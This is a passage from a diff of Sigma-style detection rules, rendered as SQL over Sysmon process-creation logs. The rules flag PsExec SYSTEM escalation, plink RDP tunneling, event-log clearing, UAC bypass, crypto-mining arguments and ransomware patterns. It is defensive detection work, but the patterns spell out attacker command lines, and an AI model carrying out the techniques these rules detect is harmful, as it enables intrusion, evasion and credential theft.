ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "status": "experimental", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "status": "experimental", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1059", "attack.t1202" ], "falsepositives": [ @@ -21072,1832 +21133,1777 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinRM usage" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.impact", - "attack.t1496" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "NTDS maintenance" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 